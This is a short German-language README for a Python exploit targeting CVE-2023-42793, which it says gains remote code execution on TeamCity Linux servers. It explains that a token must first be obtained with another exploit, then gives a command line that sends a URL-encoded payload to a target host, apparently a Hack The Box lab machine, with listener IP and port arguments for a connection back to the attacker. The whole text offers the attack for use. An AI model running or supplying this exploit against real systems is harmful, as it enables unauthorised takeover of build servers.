
Python-Exploit für CVE-2023-42793, das Remote-Code-Ausführung auf TeamCity-Linux-Servern erreicht, indem eine Payload in einer URL kodiert und an das Ziel gesendet wird.
Sie müssen das Token zunächst mit einem anderen Exploit beschaffen. Der folgende Exploit ermöglicht es Ihnen jedoch, RCE auf dem Linux-Server zu erlangen, da er die Payload URL-kodiert und an den Server sendet.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT